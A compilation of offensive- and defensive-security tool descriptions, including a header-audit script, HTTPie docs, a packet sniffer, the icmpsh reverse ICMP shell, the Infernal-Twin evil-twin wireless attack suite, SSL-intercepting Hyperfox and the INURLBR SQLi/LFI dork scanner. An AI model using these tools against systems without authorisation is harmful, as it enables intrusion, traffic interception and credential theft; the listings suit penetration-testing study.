Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not an easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html
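The checks in the report above (missing security headers, Set-Cookie without Secure/HttpOnly, an over-detailed Server value) can be reproduced on any raw header block. The following is an added example, not hsecscan's own code; the header block it audits is a constructed one that mirrors the structure of the response shown above, with placeholder cookie values.

```python
"""Audit a raw HTTP response header block for the findings the report above lists.

Added example, not part of hsecscan. The expected-header table and the CWE ids
are taken from the report; the sample header block is constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Header names the report treats as security-relevant, with the CWE it cites
# when the header is absent.
EXPECTED_SECURITY_HEADERS = {
    "Strict-Transport-Security": "CWE-311",
    "X-Content-Type-Options": "CWE-79",
    "Content-Security-Policy": "CWE-79",
    "X-Frame-Options": "CWE-693",
    "X-XSS-Protection": "CWE-79",
}

# A Server value carrying a version number (e.g. "Apache/2.4.7") is the
# fine-grained detail RFC 7231 advises against (CWE-200 in the report).
VERSION_RE = re.compile(r"\d+\.\d+")

# Constructed sample: same header names as the response in the report,
# placeholder cookie values and domain.
SAMPLE_HEADERS = """\
Date: Sun, 08 Nov 2015 14:12:18 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: PREF=ID=CONSTRUCTED:FF=0; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.example.com
Set-Cookie: NID=CONSTRUCTED; expires=Mon, 09-May-2016 14:12:18 GMT; path=/; domain=.example.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
"""


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a raw header block into (name, value) pairs.

    Order and duplicates are kept: Set-Cookie legitimately appears once per cookie.
    Leading whitespace (as in the indented report output) is tolerated.
    """
    pairs: List[Tuple[str, str]] = []
    for line in raw.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        name, value = line.split(":", 1)
        pairs.append((name.strip(), value.strip()))
    return pairs


def missing_security_headers(headers: List[Tuple[str, str]]) -> Dict[str, str]:
    """Return {header: cwe} for every expected security header that is absent."""
    present = {name.lower() for name, _ in headers}
    return {name: cwe for name, cwe in EXPECTED_SECURITY_HEADERS.items()
            if name.lower() not in present}


def audit_cookies(headers: List[Tuple[str, str]]) -> List[Dict]:
    """Check each Set-Cookie for the Secure (CWE-614) and HttpOnly attributes."""
    findings = []
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        # Attribute names are case-insensitive; values (path=, expires=) are dropped.
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        issues = []
        if "secure" not in attrs:
            issues.append("missing Secure")
        if "httponly" not in attrs:
            issues.append("missing HttpOnly")
        findings.append({"name": cookie_name, "issues": issues})
    return findings


def server_detail(headers: List[Tuple[str, str]]) -> Optional[str]:
    """Return the Server value if it discloses a version, otherwise None."""
    for name, value in headers:
        if name.lower() == "server" and VERSION_RE.search(value):
            return value
    return None


def audit(raw: str) -> Dict:
    """Run all three checks over a raw header block."""
    headers = parse_headers(raw)
    return {
        "missing": missing_security_headers(headers),
        "cookies": audit_cookies(headers),
        "server_detail": server_detail(headers),
    }


if __name__ == "__main__":
    for key, finding in audit(SAMPLE_HEADERS).items():
        print(f"{key}: {finding}")
```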


Download Hsecscan

HTTPie - a CLI, cURL-like tool for humans


HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.

HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features
  • Expressive and intuitive syntax
  • Formatted and colorized terminal output
  • Built-in JSON support
  • Forms and file uploads
  • HTTPS, proxies, and authentication
  • Arbitrary request data
  • Custom headers
  • Persistent sessions
  • Wget-like downloads
  • Python 2.6, 2.7 and 3.x support
  • Linux, Mac OS X and Windows support
  • Plugins
  • Documentation
  • Test coverage

Installation

On Mac OS X, HTTPie can be installed via Homebrew:
$ brew install httpie
Most Linux distributions provide a package that can be installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie
A universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:
# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie
(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master

Usage

Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
See also http --help.

Examples
Custom HTTP method, HTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output options:
$ http -v example.org
Use Github API to post a comment on an issue with authentication:
$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'
Upload a file using redirected input:
$ http example.org < file.json
Download a file and save it via redirected output:
$ http example.org/file > file
Download a file wget style:
$ http --download example.org/file
Use named sessions to make certain aspects of the communication persistent between requests to the same host:
$ http --session=logged-in -a username:password httpbin.org/get API-Key:123
$ http --session=logged-in httpbin.org/headers
Set a custom Host header to work around missing DNS records:
$ http localhost:8000 Host:example.com

What follows is detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:
$ http DELETE example.org/todos/7
Which looks similar to the actual Request-Line that is sent:
DELETE /todos/7 HTTP/1.1
When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example, :3000 would expand to http://localhost:3000. If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost
If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the & separators. To search for HTTPie on Google Images you could use this command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1


Download HTTPie

HTTPNetworkSniffer v1.50 - Packet Sniffer Tool That Captures All HTTP Requests/Responses


HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and then export them to text/html/xml/csv file or copy them to the clipboard and then paste them into Excel.

System Requirements
  • This utility works on any version of Windows, starting from Windows 2000 and up to Windows 10, including 64-bit systems.
  • One of the following capture drivers is required to use HTTPNetworkSniffer:
    • WinPcap Capture Driver: WinPcap is an open source capture driver that allows you to capture network packets on any version of Windows. You can download and install the WinPcap driver from this Web page.
    • Microsoft Network Monitor Driver version 2.x (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by HTTPNetworkSniffer, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
    • Microsoft Network Monitor Driver version 3.x: Microsoft provides a new version of Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. 
      The new version of Microsoft Network Monitor (3.x) is available to download from Microsoft Web site.
  • You can also try to use HTTPNetworkSniffer without installing any driver, by using the 'Raw Sockets' method. Unfortunately, Raw Sockets method has many problems:
    • It doesn't work in all Windows systems, depending on Windows version, service pack, and the updates installed on your system.
    • On Windows 7 with UAC turned on, 'Raw Sockets' method only works when you run HTTPNetworkSniffer with 'Run As Administrator'. 

Start Using HTTPNetworkSniffer

Apart from the capture driver needed for capturing network packets, HTTPNetworkSniffer doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file - HTTPNetworkSniffer.exe

After running HTTPNetworkSniffer for the first time, the 'Capture Options' window appears on the screen, and you're requested to choose the capture method and the desired network adapter. The next time you use HTTPNetworkSniffer, it'll automatically start capturing packets with the capture method and the network adapter that you previously selected. You can always change the 'Capture Options' again by pressing F9.

After choosing the capture method and network adapter, HTTPNetworkSniffer captures and displays every HTTP request/response sent between your Web browser and the remote Web server.

Command-Line Options

/load_file_pcap <Filename> Loads the specified capture file, created by WinPcap driver.
/load_file_netmon <Filename> Loads the specified capture file, created by Network Monitor driver 3.x.   


Download HTTPNetworkSniffer v1.50

Hyperfox - HTTP and HTTPs Traffic Interceptor


Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.

Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully intercepted and recorded.

Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire formatted messages.


Download Hyperfox

I2P - The Invisible Internet Project


I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other. The network itself is strictly message based (a la IP), but there is a library available to allow reliable streaming communication on top of it (a la TCP). All communication is end to end encrypted (in total there are four layers of encryption used when sending a message), and even the end points ("destinations") are cryptographic identifiers (essentially a pair of public keys).

How does it work?

To anonymize the messages sent, each client application has their I2P "router" build a few inbound and outbound "tunnels" - a sequence of peers that pass messages in one direction (to and from the client, respectively). In turn, when a client wants to send a message to another client, the client passes that message out one of their outbound tunnels targeting one of the other client's inbound tunnels, eventually reaching the destination. Every participant in the network chooses the length of these tunnels, and in doing so, makes a tradeoff between anonymity, latency, and throughput according to their own needs. The result is that the number of peers relaying each end to end message is the absolute minimum necessary to meet both the sender's and the receiver's threat model.

The first time a client wants to contact another client, they make a query against the fully distributed "network database" - a custom structured distributed hash table (DHT) based off the Kademlia algorithm. This is done to find the other client's inbound tunnels efficiently, but subsequent messages between them usually include that data so no further network database lookups are required.

What can you do with it?

Within the I2P network, applications are not restricted in how they can communicate - those that typically use UDP can make use of the base I2P functionality, and those that typically use TCP can use the TCP-like streaming library. We have a generic TCP/I2P bridge application ("I2PTunnel") that enables people to forward TCP streams into the I2P network as well as to receive streams out of the network and forward them towards a specific TCP/IP address.

I2PTunnel is currently used to let people run their own anonymous website ("eepsite") by running a normal webserver and pointing an I2PTunnel 'server' at it, which people can access anonymously over I2P with a normal web browser by running an I2PTunnel HTTP proxy ("eepproxy"). In addition, we use the same technique to run an anonymous IRC network (where the IRC server is hosted anonymously, and standard IRC clients use an I2PTunnel to contact it). There are other application development efforts going on as well, such as one to build an optimized swarming file transfer application (a la BitTorrent), a distributed data store (a la Freenet / MNet), and a blogging system (a fully distributed LiveJournal), but those are not ready for use yet.

I2P is not inherently an "outproxy" network - the client you send a message to is the cryptographic identifier, not some IP address, so the message must be addressed to someone running I2P. However, it is possible for that client to be an outproxy, allowing you to anonymously make use of their Internet connection. To demonstrate this, the "eepproxy" will accept normal non-I2P URLs (e.g. "http://www.i2p.net") and forward them to a specific destination that runs a squid HTTP proxy, allowing simple anonymous browsing of the normal web. Simple outproxies like that are not viable in the long run for several reasons (including the cost of running one as well as the anonymity and security issues they introduce), but in certain circumstances the technique could be appropriate.

The I2P development team is an open group, welcome to all who are interested in getting involved, and all of the code is open source. The core I2P SDK and the current router implementation are done in Java (currently working with both Sun and Kaffe, gcj support planned for later), and there is a simple socket based API for accessing the network from other languages (with a C library available, and both Python and Perl in development). The network is actively being developed and has not yet reached the 1.0 release, but the current roadmap describes our schedule.


Download I2P

icmpsh - Simple Reverse ICMP Shell


Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios when you have owned a machine part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell.

However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus of this tool.

Description

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run on the target machine.

The tool is clean, easy and portable. The slave (client) runs on the target Windows machine; it is written in C and works on Windows only, whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl.

Features
  • Open source software - primarily coded by Nico, forked by me.
  • Client/server architecture.
  • The master is portable across any platform that can run either C, Perl or Python code.
  • The target system has to be Windows because the slave runs on that platform only for now.
  • The user running the slave on the target system does not require administrative privileges.

Usage

Running the master

The master is straightforward to use. There are no extra libraries required for the C and Python versions. The Perl master however has the following dependencies:
  • IO::Socket
  • NetPacket::IP
  • NetPacket::ICMP
When running the master, don't forget to disable ICMP replies by the OS. For example:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive commands sent from the master.

Running the slave

The slave comes with a few command line options as outlined below:
-t host            host ip address to send ping requests to. This option is mandatory!

-r                 send a single test icmp request containing the string "Test1234" and then quit. 
                   This is for testing the connection.

-d milliseconds    delay between requests in milliseconds 

-o milliseconds    timeout of responses in milliseconds. If a response has not been received in time,
                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
                   The counter is set back to 0 if a response was received.

-b num             limit of blanks (unanswered icmp requests) before quitting

-s bytes           maximal data buffer size in bytes 
In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.


Download icmpsh

Infernal-Twin - This Is Evil Twin Attack Automated (Wireless Hacking)


This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.

Usage
sudo python InfernalWireless.py

How to install
$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

$ sudo apt-get install python-scapy 
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin


$ python db_connect_creds.py 
dbconnect.conf doesn't exists or creds are incorrect
*************** creating DB config file ************
Enter the DB username: root
Enter the password: *************
trying to connect
username root

FAQ:

I have a problem with connecting to the Database
Solution:
(Thanks to @lightos for this fix)
There seem to be a few issues with database connectivity. The solution is to create a new user on the database and use that user for launching the tool. Follow these steps.
  1. Delete dbconnect.conf file from the Infernalwireless folder
  2. Run the following command from your mysql console.
    mysql> use mysql;
    mysql> CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
    mysql> GRANT ALL PRIVILEGES ON *.* TO 'root2'@'localhost' WITH GRANT OPTION;
  3. Try to run the tool again.

Release Notes:

New Features:
  • GUI wireless security assessment suite
  • Implemented:
  • WPA2 hacking
  • WEP Hacking
  • WPA2 Enterprise hacking
  • Wireless Social Engineering
  • SSL Strip
  • Report generation
  • PDF Report
  • HTML Report
  • Note taking function
  • Data is saved into Database
  • Network mapping
  • MiTM
  • Probe Request

Changes:
  • Improved compatibility
  • Report improvement
  • Better NAT Rules

Bug Fixes:
  • Wireless Evil Access Point traffic redirect
  • Fixed WPA2 Cracking
  • Fixed Infernal Wireless
  • Fixed Free AP
  • Check for requirements
  • DB implementation via config file
  • Improved error catching
  • Works with Kali 2

Coming Soon:
  • Parsing t-shark log files for gathering creds and more
  • More attacks.

Expected bugs:
  • Wireless card might not be supported
  • Window might crash
  • Freeze
  • A lot of work to be done, but this tool is still being developed.


Download Infernal-Twin

Instant PDF Password Protector - Password Protect PDF file


Instant PDF Password Protector is a free tool to quickly password-protect PDF files on your system.

With the click of a button, you can lock or protect any of your sensitive/private PDF documents. You can also choose any of the standard encryption methods - RC4/AES (40-bit, 128-bit, 256-bit) - according to the desired security level.

In addition, it helps you set advanced restrictions to prevent printing, copying or modification of the target PDF file. To secure it further, you can also set an 'Owner Password' (also called the Permissions Password) to stop anyone from removing these restrictions.

'PDF Password Protector' includes an installer for quick installation/uninstallation. It works on both 32-bit and 64-bit platforms, from Windows XP to Windows 8.

Features
  • Instantly Password Protect PDF document with a click of button
  • Supports all versions of PDF documents
  • Lock PDF file with Password (User/Document Open Password)
  • Supports all the standard Encryption methods - RC4/AES (40-bit,128-bit, 256-bit)
  • [Advanced] Protect PDF file by adding following Restrictions
    • Copying
    • Printing
    • Signing
    • Commenting
    • Changing the Document
    • Document Assembly
    • Page Extraction
    • Filling of Form Fields
  • [Advanced] Set the Permission Password (Owner Password) to prevent removal of above restrictions
  • Advanced Settings Dialog to quickly alter above permissions/restrictions
  • Drag & Drop support for easier selection of PDF file
  • Very easy to use with simple & attractive GUI screen
  • Support for local Installation and uninstallation of the software

Download Instant PDF Password Protector

InstaRecon - Automated Digital Reconnaissance


Automated basic digital reconnaissance. Great for getting an initial footprint of your targets and discovering additional subdomains. InstaRecon will do:
  • DNS (direct, PTR, MX, NS) lookups
  • Whois (domains and IP) lookups
  • Google dorks in search of subdomains
  • Shodan lookups
  • Reverse DNS lookups on entire CIDRs

...all printed nicely on your console or csv file.
InstaRecon will never scan a target directly. Information is retrieved from DNS/Whois servers, Google, and Shodan.

Installing with pip

Simply install dependencies using pip. Tested on Ubuntu 14.04 and Kali Linux 1.1.0a.
pip install -r requirements.txt
or
pip install pythonwhois ipwhois ipaddress shodan


Example

$ ./instarecon.py -s <shodan_key> -o ~/Desktop/github.com.csv github.com
# InstaRecon v0.1 - by Luis Teixeira (teix.co)
# Scanning 1/1 hosts
# Shodan key provided - <shodan_key>

# ____________________ Scanning github.com ____________________ #

# DNS lookups
[*] Domain: github.com

[*] IPs & reverse DNS: 
192.30.252.130 - github.com

[*] NS records:
ns4.p16.dynect.net
    204.13.251.16 - ns4.p16.dynect.net
ns3.p16.dynect.net
    208.78.71.16 - ns3.p16.dynect.net
ns2.p16.dynect.net
    204.13.250.16 - ns2.p16.dynect.net
ns1.p16.dynect.net
    208.78.70.16 - ns1.p16.dynect.net

[*] MX records:
ALT2.ASPMX.L.GOOGLE.com
    173.194.64.27 - oa-in-f27.1e100.net
ASPMX.L.GOOGLE.com
    74.125.203.26
ALT3.ASPMX.L.GOOGLE.com
    64.233.177.26
ALT4.ASPMX.L.GOOGLE.com
    173.194.219.27
ALT1.ASPMX.L.GOOGLE.com
    74.125.25.26 - pa-in-f26.1e100.net

# Whois lookups

[*] Whois domain:

[*] Whois IP:
asn: 36459
asn_cidr: 192.30.252.0/24
asn_country_code: US
asn_date: 2012-11-15
asn_registry: arin
net 0:
    cidr: 192.30.252.0/22
    range: 192.30.252.0 - 192.30.255.255
    name: GITHUB-NET4-1
    description: GitHub, Inc.
    handle: NET-192-30-252-0-1

    address: 88 Colin P Kelly Jr Street
    city: San Francisco
    state: CA
    postal_code: 94107
    country: US

    abuse_emails: abuse@github.com
    tech_emails: hostmaster@github.com

    created: 2012-11-15 00:00:00
    updated: 2013-01-05 00:00:00

# Querying Shodan for open ports
[*] Shodan:
IP: 192.30.252.130
Organization: GitHub
ISP: GitHub

Port: 22
Banner: SSH-2.0-libssh-0.6.0
    Key type: ssh-rsa
    Key: AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa+PXYPCPy6rbTrTtw7PH
    kccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETY
    P81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf+Se8xhHTvKSCZIFImWwoG6mbUoW
    f9nzpIoaSjB+weqqUUmpaaasXVal72J+UX2B+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lG
    HSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7+wC604ydGXA8VJiS5ap43JXiUFFAaQ==
    Fingerprint: 16:27:ac:a5:76:28:2d:36:63:1b:56:4d:eb:df:a6:48
Port: 80
Banner: HTTP/1.1 301 Moved Permanently
    Content-length: 0
    Location: https://192.30.252.130/
    Connection: close

# Querying Google for subdomains and Linkedin pages, this might take a while
[*] Possible LinkedIn page: https://au.linkedin.com/company/github
[*] Subdomains:

# Reverse DNS lookup on range 192.30.252.0/22
# Saving output csv file
# Done


Download InstaRecon

Intrigue - Intelligence Gathering Framework


Intrigue-core is an API-first intelligence gathering framework for Internet reconnaissance and research.

Setting up a development environment

The following are presumed available and configured in your environment
  • redis
  • sudo
  • nmap
  • zmap
  • masscan
  • java runtime
Sudo is used to obtain root access for certain commands, so make sure these do not require a password:
your-username ALL = NOPASSWD: /usr/bin/masscan, /usr/sbin/zmap, /usr/bin/nmap

Starting up...

Make sure you have redis installed and running. (Use Homebrew if you're on OSX).
Install all gem dependencies with Bundler (http://bundler.io/)
$ bundle install
Start the web and background workers. Intrigue will start on 127.0.0.1:7777.
$ foreman start
Now, browse to the web interface.

Using the web interface

To use the web interface, browse to http://127.0.0.1:7777
Getting started should be pretty straightforward: try running a "dns_brute_sub" task on your domain. Then try again with the "use_file" option set to true.

API usage via core-cli:

A command line utility has been added for convenience, core-cli.
List all available tasks:
$ bundle exec ./core-cli.rb list
Start a task:
$ bundle exec ./core-cli.rb start dns_lookup_forward DnsRecord#intrigue.io
Start a task with options:
$ bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#intrigue.io resolver=8.8.8.8#brute_list=1,2,3,4,www#use_permutations=true
[+] Starting task
[+] Task complete!
[+] Start Results
  DnsRecord#www.intrigue.io
  IpAddress#192.0.78.13
[ ] End Results
[+] Task Log:
[ ] : Got allowed option: resolver
[ ] : Allowed option: {:name=>"resolver", :type=>"String", :regex=>"ip_address", :default=>"8.8.8.8"}
[ ] : Regex should match an IP Address
[ ] : No need to convert resolver to a string
[+] : Allowed user_option! {"name"=>"resolver", "value"=>"8.8.8.8"}
[ ] : Got allowed option: brute_list
[ ] : Allowed option: {:name=>"brute_list", :type=>"String", :regex=>"alpha_numeric_list", :default=>["mx", "mx1", "mx2", "www", "ww2", "ns1", "ns2", "ns3", "test", "mail", "owa", "vpn", "admin", "intranet", "gateway", "secure", "admin", "service", "tools", "doc", "docs", "network", "help", "en", "sharepoint", "portal", "public", "private", "pub", "zeus", "mickey", "time", "web", "it", "my", "photos", "safe", "download", "dl", "search", "staging"]}
[ ] : Regex should match an alpha-numeric list
[ ] : No need to convert brute_list to a string
[+] : Allowed user_option! {"name"=>"brute_list", "value"=>"1,2,3,4,www"}
[ ] : Got allowed option: use_permutations
[ ] : Allowed option: {:name=>"use_permutations", :type=>"Boolean", :regex=>"boolean", :default=>true}
[ ] : Regex should match a boolean
[+] : Allowed user_option! {"name"=>"use_permutations", "value"=>true}
[ ] : user_options: [{"resolver"=>"8.8.8.8"}, {"brute_list"=>"1,2,3,4,www"}, {"use_permutations"=>true}]
[ ] : Task: dns_brute_sub
[ ] : Id: fddc7313-52f6-4d5a-9aad-fd39b0428ca5
[ ] : Task entity: {"type"=>"DnsRecord", "attributes"=>{"name"=>"intrigue.io"}}
[ ] : Task options: [{"resolver"=>"8.8.8.8"}, {"brute_list"=>"1,2,3,4,www"}, {"use_permutations"=>true}]
[ ] : Option configured: resolver=8.8.8.8
[ ] : Option configured: use_file=false
[ ] : Option configured: brute_file=dns_sub.list
[ ] : Option configured: use_mashed_domains=false
[ ] : Option configured: brute_list=1,2,3,4,www
[ ] : Option configured: use_permutations=true
[ ] : Using provided brute list
[+] : Using subdomain list: ["1", "2", "3", "4", "www"]
[+] : Looks like no wildcard dns. Moving on.
[-] : Hit exception: no address for 1.intrigue.io
[-] : Hit exception: no address for 2.intrigue.io
[-] : Hit exception: no address for 3.intrigue.io
[-] : Hit exception: no address for 4.intrigue.io
[+] : Resolved Address 192.0.78.13 for www.intrigue.io
[+] : Creating entity: DnsRecord, {:name=>"www.intrigue.io"}
[+] : Creating entity: IpAddress, {:name=>"192.0.78.13"}
[ ] : Adding permutations: www1, www2
[-] : Hit exception: no address for www1.intrigue.io
[-] : Hit exception: no address for www2.intrigue.io
[+] : Ship it!
[ ] : Sending to Webhook: http://localhost:7777/v1/task_runs/fddc7313-52f6-4d5a-9aad-fd39b0428ca5
Check for a list of subdomains on intrigue.io:
$ bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#intrigue.io resolver=8.8.8.8#brute_list=a,b,c,proxy,test,www
Check the Alexa top 1000 domains for the existence of security headers:
$ for x in `cat data/domains.txt | head -n 1000`; do bundle exec ./core-cli.rb start dns_brute_sub DnsRecord#$x;done

API usage via rubygem

$ gem install intrigue
$ irb

> require 'intrigue'
> x =  Intrigue.new

  # Create an entity hash, must have a :type key
  # and (in the case of most tasks)  a :attributes key
  # with a hash containing a :name key (as shown below)
> entity = {
    :type => "String",
    :attributes => { :name => "intrigue.io"}
  }

  # Create a list of options (this can be empty)
> options_list = [
    { :name => "resolver", :value => "8.8.8.8" }
  ]

  # Start the task with the entity hash and options defined above,
  # keeping the returned id to fetch the log and result afterwards
> id  = x.start "example", entity, options_list
> puts x.get_log id
> puts x.get_result id

API usage via curl:

You can use the tried and true curl utility to request a task run. Specify the task type, specify an entity, and the appropriate options:
$ curl -s -X POST -H "Content-Type: application/json" -d '{ "task": "example", "entity": { "type": "String", "attributes": { "name": "8.8.8.8" } }, "options": {} }' http://127.0.0.1:7777/v1/task_runs


Download Intrigue-core

INURLBR - Advanced Search in Multiple Search Engines



Advanced search across multiple search engines; it analyses the results to exploit GET / POST parameters, captures e-mails and URLs, and applies an internal custom validation step to each target / URL found.

INURLBR scanner was developed by Cleiton Pinheiro, owner and founder of INURL - BRASIL.

Made in PHP, the tool runs on different Linux distributions and helps hackers / security professionals in their specific searches.

Its many options automate the exploration methods, and the scanner is known for its ease of use and performance.

The inspiration to create the inurlbr scanner was the XROOT Scan 5.2 application.

Long description

The INURLBR tool was developed to meet the needs of the hacking community.
Purpose: perform advanced searches to find potential vulnerabilities in web applications (known as Google Hacking) with various options and search filters; the tool has enormous search power, with 24 search engines available plus 6 special (deep web) engines:
  • Possibility to generate IP ranges or random IPs and analyze those targets.
  • Customization of HTTP header, User-Agent and URL referer.
  • Execution of external exploits against certain targets.
  • Random dork generator, or dorks read from a file.
  • Option to set a proxy, a proxy list file, an HTTP proxy or an HTTP proxy file.
  • Set the interval for random proxy rotation.
  • Possible to use random TOR exit IPs.
  • Debug output for URL processing, HTTP requests and the IRC process.
  • IRC server communication, sending vulnerable URLs to a chat room.
  • Possibility to inject exploits via GET / POST => SQLI, LFI, LFD.
  • Filtering and validation based on regular expressions.
  • Extraction of e-mails and URLs.
  • Validation using HTTP status code.
  • Search pages based on a strings file.
  • Exploit command manager.
  • Paging limiter for search engines.
  • Beep sound when a vulnerability is triggered.
  • Use a text file as the data source of URLs to test.
  • Find custom strings in the return values of the tests.
  • Shellshock vulnerability validation.
  • Validation of wordpress wp-config.php file values.
  • Execution of sub-validation processes.
  • Validation of database and programming syntax errors.
  • Data encryption as a native parameter.
  • Random Google host.
  • Port scan.
  • Error checking & values:
LIB & PERMISSION:
  • PHP Version         5.4.7
  • php5-curl           LIB
  • php5-cli            LIB  
  • cURL support        enabled
  • cURL Information    7.24.0
  • allow_url_fopen     On
  • permission          Reading & Writing
  • User                root privilege, or is in the sudoers group
  • Operating system    LINUX
  • Proxy random        TOR
  • PERMISSION EXECUTION: chmod +x inurlbr.php
  • INSTALLING LIB CURL: sudo apt-get install php5-curl
  • INSTALLING LIB CLI: sudo apt-get install php5-cli
  • INSTALLING PROXY TOR https://www.torproject.org/docs/debian.html.en
Summary: apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl

Help:
-h
--help   Alternative long length help command.
--ajuda  Command to specify Help.
--info   Information script.
--update Code update.    
-q       Choose which search engine you want through [1...24] / [e1..6]]:
     [options]:
     1   - GOOGLE / (CSE) GENERIC RANDOM / API
     2   - BING
     3   - YAHOO BR
     4   - ASK
     5   - HAO123 BR
     6   - GOOGLE (API)
     7   - LYCOS
     8   - UOL BR
     9   - YAHOO US
     10  - SAPO
     11  - DMOZ
     12  - GIGABLAST
     13  - NEVER
     14  - BAIDU BR
     15  - YANDEX
     16  - ZOO
     17  - HOTBOT
     18  - ZHONGSOU
     19  - HKSEARCH
     20  - EZILION
     21  - SOGOU
     22  - DUCK DUCK GO
     23  - BOOROW
     24  - GOOGLE(CSE) GENERIC RANDOM
     ----------------------------------------
                 SPECIAL MOTORS
     ----------------------------------------
     e1  - TOR FIND
     e2  - ELEPHANT
     e3  - TORSEARCH
     e4  - WIKILEAKS
     e5  - OTN
     e6  - EXPLOITS SHODAN
     ----------------------------------------
     all - All search engines / not special motors
     Default:    1
     Example: -q {op}
     Usage:   -q 1
              -q 5
               Using more than one engine:  -q 1,2,5,6,11,24
               Using all engines:      -q all

 --proxy Choose which proxy you want to use through the search engine:
     Example: --proxy {proxy:port}
     Usage:   --proxy localhost:8118
              --proxy socks5://googleinurl@localhost:9050
              --proxy http://admin:12334@172.16.0.90:8080

 --proxy-file Set font file to randomize your proxy to each search engine.
     Example: --proxy-file {proxys}
     Usage:   --proxy-file proxys_list.txt

 --time-proxy Set the time how often the proxy will be exchanged.
